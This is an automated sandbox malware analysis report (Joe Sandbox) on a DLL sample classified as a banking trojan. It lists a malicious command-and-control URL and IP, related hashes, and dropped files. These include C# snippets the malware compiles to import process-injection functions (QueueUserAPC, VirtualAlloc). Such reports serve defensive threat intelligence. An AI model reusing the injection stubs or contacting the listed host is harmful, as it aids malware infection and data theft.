                      • Avira URL Cloud: safe
                      		unknown
                      http://94.140.115.8/drew/BCNeqjF198SdSe826/ArOdCqmPIWdy/mLsvCOAaonH/_2B_2FaHw_2FNP/whZllPw0UWDpWxMk3vD70/ZW7HQlXyVsLFMEnd/ioWk92wZdXi7gVZ/YpqeONxg_2FtJ1pLE0/gkg_2BzOr/T30turd_2FCKY_2FdW3S/SQG35opQqK5eweX5X3z/X5WbnNy0h0F7CgoMJPXQn8/WlhTd00F2BAHX/eC3JkGFi/jMv01ywCxcdZG9_2BXsKQ2k/cWPyDUzVgF/HeX7VJFkhkvecZXZ0/41xqfgFNRUy_/2Fgmw0qSg6Ao/JqGQVxm.jlktrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://https://file://USER.ID%lu.exe/updrundll32.exe, 00000002.00000003.356868757.0000000005F38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371395758.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371299641.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://constitution.org/usdeclar.txtrundll32.exe, 00000002.00000003.356868757.0000000005F38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371395758.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371299641.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://crl.micropowershell.exe, 00000014.00000003.329756539.000001ED77FA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.329437199.000001ED77FA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.369787923.000001ED77FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://constitution.org/usdeclar.txtC:rundll32.exe, 00000002.00000003.356868757.0000000005F38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371395758.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371299641.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      94.140.115.8
                      		unknownLatvia
                      		43513NANO-ASLVtrue

                      Private

                      IP
                      192.168.2.1

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:617384
                      Start date and time: 28/04/202215:46:162022-04-28 15:46:16 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 11m 3s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:626a983c091a8.tiff.dll
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:38
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.bank.troj.evad.winDLL@24/17@0/2
                      EGA Information:
                      • Successful, ratio: 50%
                      HDC Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 59
                      • Number of non-executed functions: 191
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                      • Excluded IPs from analysis (whitelisted): 13.107.42.16
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, arc.msn.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, config.edge.skype.com
                      • Execution Graph export aborted for target mshta.exe, PID 6312 because there are no executed function
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      15:47:26API Interceptor1x Sleep call for process: rundll32.exe modified
                      15:48:03API Interceptor39x Sleep call for process: powershell.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      94.140.115.8626a961800203.dllGet hashmaliciousBrowse
                        EIo7Dh2fzn.dllGet hashmaliciousBrowse
                          3r0Cgcbr8c.dllGet hashmaliciousBrowse

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            NANO-ASLV626a961800203.dllGet hashmaliciousBrowse
                            • 94.140.115.8
                            EIo7Dh2fzn.dllGet hashmaliciousBrowse
                            • 94.140.115.8
                            3r0Cgcbr8c.dllGet hashmaliciousBrowse
                            • 94.140.115.8
                            bKhQyaq7WP.exeGet hashmaliciousBrowse
                            • 94.140.115.224
                            l0zzxRl556.exeGet hashmaliciousBrowse
                            • 94.140.115.224
                            6DK0EB55d9.msiGet hashmaliciousBrowse
                            • 94.140.115.44
                            ProjectsSheet.xlsGet hashmaliciousBrowse
                            • 94.140.115.44
                            ProjectsSheet.xlsGet hashmaliciousBrowse
                            • 94.140.115.44
                            ProjectsSheet.xlsGet hashmaliciousBrowse
                            • 94.140.115.44
                            SecuriteInfo.com.W32.Trojan.TCNN-1225.26439.exeGet hashmaliciousBrowse
                            • 91.203.69.240
                            SNC-1823171407-Apr-6.xlsbGet hashmaliciousBrowse
                            • 94.140.115.210
                            SNC-1823171407-Apr-6.xlsbGet hashmaliciousBrowse
                            • 94.140.115.210
                            5f1hPXQgBa.exeGet hashmaliciousBrowse
                            • 94.140.114.207
                            oZdVEauO18.exeGet hashmaliciousBrowse
                            • 94.140.114.229
                            NFT-291422805-Mar-25.xlsbGet hashmaliciousBrowse
                            • 94.140.114.173
                            NFT-291422805-Mar-25.xlsbGet hashmaliciousBrowse
                            • 94.140.114.173
                            Compliance-Report-51318741-Mar-02.xlsbGet hashmaliciousBrowse
                            • 94.140.114.138
                            Compliance-Report-51318741-Mar-02.xlsbGet hashmaliciousBrowse
                            • 94.140.114.138
                            85585722.exeGet hashmaliciousBrowse
                            • 94.140.115.56
                            75006628.exeGet hashmaliciousBrowse
                            • 94.140.115.56

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):11606
                            Entropy (8bit):4.8910535897909355
                            Encrypted:false
                            SSDEEP:192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ
                            MD5:F84F6C99316F038F964F3A6DB900038F
                            SHA1:C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1
                            SHA-256:F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E
                            SHA-512:E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31
                            Malicious:false
                            Preview:PSMODULECACHE.....7B\.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........3......[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                            C:\Users\user\AppData\Local\Temp\RES9868.tmp

                            Download File
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                            Category:dropped
                            Size (bytes):1328
                            Entropy (8bit):3.995664612989827
                            Encrypted:false
                            SSDEEP:24:HM2je9E2+fQIDfHlQhKdNWI+ycuZhNeqakSpbPNnq9qd:/QGFyKd41uleqa3pRq9K
                            MD5:6587DEF66392DAB6B08BF59A1C8F335D
                            SHA1:D3BDF1132EB91B84F76740631C5FB05E1EC06E00
                            SHA-256:1538AF45B6819C8771B587E453588ABFE4F027FE368051BEE4FE1757BF7D6007
                            SHA-512:E598F1A700D83B9E66F1993D69390C9D13A1F0FAB1847AA7B0F5C22C21C745A2453B9D8CB3CFA724F1D812F82CD8D0765940F50177FF923D27C53FE238EC7D5E
                            Malicious:false
                            Preview:L.....jb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\o1ulwvct\CSC9597862635B74071BA42F3284427E86E.TMP...................3!A.1../c..#..........4.......C:\Users\user\AppData\Local\Temp\RES9868.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.1.u.l.w.v.c.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                            C:\Users\user\AppData\Local\Temp\RESA96F.tmp

                            Download File
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                            Category:dropped
                            Size (bytes):1328
                            Entropy (8bit):3.9710842422597117
                            Encrypted:false
                            SSDEEP:24:HMje9EuZfAt+ov4DfHnhKdNWI+ycuZhNYakS0PNnq9qd:fBALuBKd41ulYa3Uq9K
                            MD5:6A48F7D6DEFC4A58B553495102391375
                            SHA1:CE2F027ACDF13CD5A8A3831EC5C08A83E7005E97
                            SHA-256:46848DC2C4440B7CC5D30DF42845016CC7008B768ED61F96A89D551800EBFB57
                            SHA-512:C20E075B4C315F9F79620DE140CAA700BC47149D13348022D6A90492BCFC2B29A5DF135C2BBCAFB00D412D6CE12FD2A8E9FE29173EC5A571CA234A4AAB6851B2
                            Malicious:false
                            Preview:L...#.jb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\tn4ral5l\CSC7E5DF85510FF49B49113DD9CBF81BD4.TMP................zu.Y..n9.%.m...{..........4.......C:\Users\user\AppData\Local\Temp\RESA96F.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.n.4.r.a.l.5.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_04s3loul.cwz.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gpafcgl0.stl.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Users\user\AppData\Local\Temp\o1ulwvct\CSC9597862635B74071BA42F3284427E86E.TMP

                            Download File
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:MSVC .res
                            Category:dropped
                            Size (bytes):652
                            Entropy (8bit):3.106144324425024
                            Encrypted:false
                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryqXqak7YnqqZXbPN5Dlq5J:+RI+ycuZhNeqakSpbPNnqX
                            MD5:0CA3AAF1332141EC31A3082F63FCC223
                            SHA1:275094865A6819117E9F912250B4678A7E47CBE1
                            SHA-256:CF1FEF2B2110B06F3E111F93F7C643785D63E3A26635FFA5A025860EC71C529D
                            SHA-512:7179731F0F2A12E574C9111AE7FC048DA21AE1310DC94D8820AAA8ED09D70858A07879F3635A04240B703D1D53DCBE00400EC55907C400B814F385E179116EFD
                            Malicious:false
                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.1.u.l.w.v.c.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...o.1.u.l.w.v.c.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                            C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.0.cs

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text
                            Category:dropped
                            Size (bytes):403
                            Entropy (8bit):5.058106976759534
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                            MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                            SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                            SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                            SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                            Malicious:false
                            Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.

                            C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.cmdline

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):369
                            Entropy (8bit):5.228628350308548
                            Encrypted:false
                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fDQiGdGqzxs7+AEszIwkn23fDQiGdGP:p37Lvkmb6KRfkNWZEifko
                            MD5:0D4B64639A192247DF402E019930BB67
                            SHA1:CA1AF61AC898895AC43D1A7CBE6B19EEB309F2D1
                            SHA-256:15A70E1E3F2D41533C027174C48ADE604221D1FF09076828E0E094A2B2AAB8ED
                            SHA-512:D4E6EF9C54DCD84BA4B58DD5C5B1E827421B1B572794290A2D96052574D4949761950CE3A8560715B8334A30C7FF36BE518A7FDA14610393007E1D6181C820CF
                            Malicious:false
                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.0.cs"

                            C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.dll

                            Download File
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):3584
                            Entropy (8bit):2.6167081012196842
                            Encrypted:false
                            SSDEEP:24:etGSG8OmU0t3lm85xWAseO4z8Q64pfUPtkZfPx0xSz3VUWI+ycuZhNeqakSpbPNq:6gXQ3r5xNOzQfUuJJ0xc31uleqa3pRq
                            MD5:A1D5C3054EA8FFA5550A29CE9E6F74F9
                            SHA1:733D9BE957632F61B0E6E16A7CBC56F4515DD03F
                            SHA-256:5609E8BDF9FEA420BD27DFC2199324182BF52C8E57B036B4C1744CE82DE9A87D
                            SHA-512:5642AED56E506AA6373CEFB8AC41C6A7D7E642E9011A547A54348445D5EEA69BED2EFC0B313F06362AC30794D93EC544AFECEFE3CB2E9BD3953930D0F8CCCEE9
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....jb...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....p.....w.....~...............a. ...a...!.a.%...a.......*.....3.0.....6.......C.......V...........

                            C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.out

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                            Category:modified
                            Size (bytes):866
                            Entropy (8bit):5.318127705611573
                            Encrypted:false
                            SSDEEP:24:AId3ka6KRf7EifmKaM5DqBVKVrdFAMBJTH:Akka6C7EumKxDcVKdBJj
                            MD5:9220957F6304D18EBE11EEB2E498901F
                            SHA1:4AFE215A0ABFE86D27724AD19C757562E85BD206
                            SHA-256:7A8B3042CDBAAF872FAD5B137DBD4C29526E2B5D26EC23ADE382C5CBF0F2D9D0
                            SHA-512:C242A94B75DB54809816DDE407132F730CF5EC42D196C4DD5F882AE38FA3D1E63239C276094110AF5FA7F3F47BBBAA1D674115D36C298C88504CB56FA0D4F735
                            Malicious:false
                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                            C:\Users\user\AppData\Local\Temp\tn4ral5l\CSC7E5DF85510FF49B49113DD9CBF81BD4.TMP

                            Download File
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:MSVC .res
                            Category:dropped
                            Size (bytes):652
                            Entropy (8bit):3.070250175986324
                            Encrypted:false
                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryWak7Ynqq0PN5Dlq5J:+RI+ycuZhNYakS0PNnqX
                            MD5:7A75DA598ED96E390E25DC6D02BDCD7B
                            SHA1:59A35E35426D7A769C59273042375DE1A3DB1CEA
                            SHA-256:B4C0AE1F1CA5E0AE438B82750A560A9B4B2B2A6629B91AFF268515EBB9D006AE
                            SHA-512:25C938C2B4458FEAEF3B915AF37A4003A3CA8B8CF1FF91B2B8650DB1AA2D99218C2AEF30B1BC6381DE4065390D60997C020F75BB838AA2EDD744B6FB748D3C5B
                            Malicious:false
                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.n.4.r.a.l.5.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.n.4.r.a.l.5.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                            C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.0.cs

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text
                            Category:dropped
                            Size (bytes):392
                            Entropy (8bit):4.988829579018284
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                            MD5:80545CB568082AB66554E902D9291782
                            SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                            SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
                            SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                            Malicious:false
                            Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.

                            C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.cmdline

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):369
                            Entropy (8bit):5.178508652415704
                            Encrypted:false
                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fMJT9zxs7+AEszIwkn23fMJTY:p37Lvkmb6KRfAT9WZEifATY
                            MD5:2AC07CA087D2B630DDE7F8CA8C735F5E
                            SHA1:73CAEF5C78A7EA6A779521DDB938AA4C7C67CFF8
                            SHA-256:AD71536ED4CC55973C9DE915BC6C784B036CD0BC31FDC72BC19891535A0CE208
                            SHA-512:9FFECE26A01583FA5922538757FB3EBCDCC277F41E275DBB0CB4E53A93C2F01CBFE966F397164A2B07C813A48C5E50B2016EC69E98F54A27E16ACA1DBDEF7D2C
                            Malicious:false
                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.0.cs"

                            C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.dll

                            Download File
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):3584
                            Entropy (8bit):2.592678879252231
                            Encrypted:false
                            SSDEEP:24:etGS3/u2Bg85z7xlfwZD6SgdWqtkZfSwzWI+ycuZhNYakS0PNnq:6GYb5hFCD6TWdJSZ1ulYa3Uq
                            MD5:56BB941B344F5E00BD719C3B50396B06
                            SHA1:BCEDEEBAC6120B395E3CF217828EE9DD8BA8E8CE
                            SHA-256:767A6177DB9E00E45FD811D64F595B0D8D816AD6EAC42B46A791E0CB0B17FA95
                            SHA-512:C8ED28D50EFED53C2B04BFD3DFDFFB77CBE86005728C9E5575A5912CBA4A041C64EBB3410B227F4982C4820328242A54B7382FF73627D21F01C6B460F4980690
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...".jb...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......`.........f.....o.....s.....z...............`. ...`...!.`.%...`.......*.....3.+.....9.......K.......S...........

                            C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.out

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                            Category:modified
                            Size (bytes):866
                            Entropy (8bit):5.301947942506882
                            Encrypted:false
                            SSDEEP:24:AId3ka6KRfATSEifATNKaM5DqBVKVrdFAMBJTH:Akka6CATSEuATNKxDcVKdBJj
                            MD5:DDC54E3FAE36E0AA75B36EA5C85F4098
                            SHA1:A1F1DFF87060524E1C350141B9DE22F2D3067AB5
                            SHA-256:EBD48312C734BDFAA4F92726959CF518F1A7D12D31041693AD66109C99BAB7ED
                            SHA-512:E0B337A41A8FC17C9458BCBF0860CE75D189025DDBF16952180A82D0868148B61A016CF149D4F3F44D8F763156F627459787461C8CDB3A577274FBF66575782F
